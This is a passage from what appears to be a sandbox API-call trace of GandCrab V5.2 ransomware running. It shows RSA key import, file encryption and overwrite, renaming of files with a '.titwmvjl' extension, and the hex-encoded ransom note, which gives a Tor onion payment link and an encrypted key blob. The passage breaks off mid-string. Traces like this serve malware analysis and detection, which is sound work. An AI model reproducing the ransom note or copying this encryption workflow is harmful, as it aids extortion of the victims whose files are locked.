szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0089.464] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0089.464] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0089.464] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0089.464] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259f44c | out: pbBuffer=0x259f44c) returned 1 [0089.464] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.464] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0089.464] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.464] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.465] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0089.466] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.466] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x503278) returned 1 [0089.466] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.466] CryptGetKeyParam (in: hKey=0x503278, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0089.466] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.467] CryptEncrypt (in: hKey=0x503278, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0089.467] GetLastError () returned 0x0 [0089.467] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.467] CryptDestroyKey (hKey=0x503278) returned 1 [0089.467] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.467] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0089.467] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.467] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0089.468] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.468] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x5036f8) returned 1 [0089.468] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.469] CryptGetKeyParam (in: hKey=0x5036f8, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0089.469] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.469] CryptEncrypt (in: hKey=0x5036f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0089.469] GetLastError () returned 0x0 [0089.469] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.469] CryptDestroyKey (hKey=0x5036f8) returned 1 [0089.469] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.469] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0089.469] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0089.469] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0089.470] ReadFile (in: hFile=0x2ac, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259f470*=0x2b00, lpOverlapped=0x0) returned 1 [0089.475] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xffffd500, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.475] WriteFile (in: hFile=0x2ac, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x2b00, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259f454*=0x2b00, lpOverlapped=0x0) returned 1 [0089.478] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.478] WriteFile (in: hFile=0x2ac, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259f454*=0x21c, lpOverlapped=0x0) returned 1 [0089.479] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.484] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.484] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.484] CloseHandle (hObject=0x2ac) returned 1 [0089.485] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Z_MqB_.ods" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\z_mqb_.ods"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Z_MqB_.ods.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\z_mqb_.ods.titwmvjl"), dwFlags=0x1) returned 1 [0089.485] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.486] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 0 [0089.486] FindClose (in: hFindFile=0x5034f8 | out: hFindFile=0x5034f8) returned 1 [0089.486] CloseHandle (hObject=0x230) returned 1 [0089.487] FindNextFileW (in: hFindFile=0x503678, lpFindFileData=0x259f7b8 | out: lpFindFileData=0x259f7b8) returned 1 [0089.487] lstrcmpW (lpString1="Documents", lpString2=".") returned 1 [0089.487] lstrcmpW (lpString1="Documents", lpString2="..") returned 1 [0089.487] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\", lpString2="Documents" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents" [0089.487] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\" [0089.487] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0089.487] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0089.487] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0089.487] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0089.487] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0089.487] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0089.488] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0089.488] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0089.488] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0089.488] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.488] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0089.488] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\\\TITWMVJL-DECRYPT.txt") returned 53 [0089.488] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230 [0089.488] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x4